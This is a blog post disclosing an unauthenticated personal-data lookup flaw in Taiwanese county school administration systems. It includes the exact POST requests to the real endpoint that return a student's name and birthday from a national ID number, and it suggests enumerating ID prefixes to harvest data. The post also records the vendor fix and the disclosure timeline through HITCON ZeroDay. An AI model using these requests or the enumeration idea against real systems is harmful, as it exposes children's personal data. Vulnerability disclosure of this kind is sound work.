Back to Posts

新北等眾多縣市校務行政系統存在任意讀取個資漏洞

Posted in Vulnerability

影響範圍

全誼科技所維護之各縣市校務行政系統

發現過程

由側邊攔家長帳號登記家長帳號申請輸入家長身份證字號 示意圖

並在點擊檢查後無條件顯示資料

期間共發 2 筆 POST Request 且皆不需帶認證資料、驗證碼

POST https://esa.ntpc.edu.tw/jsp/olreg/OlregAction.do?method=chkIdno01
idno=A123456789

["true",""]
POST https://esa.ntpc.edu.tw/jsp/olreg/OlregAction.do?method=getAdData
idno=A123456789

[{"birthday":"2014/09/01","AD":"1","name":"陳思卉","birthday1":"20140901","birthday2":"103/09/01","idno":"A123456789"}]

自動帶出此身份證於資料庫的姓名、生日 示意圖

後記

此漏洞已於回報後改為需要帶已登入之 Session ID 但仍未加入驗證碼或是限制短時間內請求次數

由於學生 ID 為身份證字號,如有心要利用,可以同縣市內大多數學生之身分證 prefix (Ex. A131, F230, etc.) 取得大量資料 如有大量對照清單,等同於取得學生身份證字號

新北市教育局則於 Oct 26 發函給各校

有關民間資安通報平台指出,新北市校務行政系統具有系統漏洞,可於免登入狀態,透過特定網址直接查詢個人資料事宜,恐有個資洩漏疑慮。 經查證,該系統確有此查詢功能,惟需在知悉查詢對象完整身分證字號前提下,方可成功查詢, 且資料僅限於生日及姓名,原設計目的係當子女代為申請家長帳號時,系統可自動比對該身分證字號是否已存在於系統內,並代出生日及姓名提供予導師,方便確認家長身分,避免因身分證字號輸入錯誤,造成非學生家長獲得家長帳號權限。

另本局於105年9月27日接獲通知後,即於當日完成程式修正,使用者須為新北市學生,並使用該系統帳號密碼登入狀態下,方可使用該查詢功能,並加入相關機制,避免有心人士透過程式大量查詢,本局亦將持續關注資安議題,強化個人資料保護。

時間軸

日期 事件
Sep 10 發現漏洞
Sep 25 整理完成並通報 HITCON ZeroDay
Sep 27 HITCON ZeroDay 通報負責廠商處理
Oct 05 再次確認時發現已加上 session 驗證
Oct 15 廠商通知已修補
Oct 25 隱藏頁面,顯示 「500 發生錯誤」圖片
Oct 27 重新加入頁面,改為須驗證碼,且僅回傳拿掉第二字的姓名
Nov 09 HITCON ZeroDay 公開此漏洞

相關連結

PHP 開發者,目前就讀高中

Read Next

Smokeping Config Generator

Read Previous

Smokeping - 網路延遲數據 (圖表)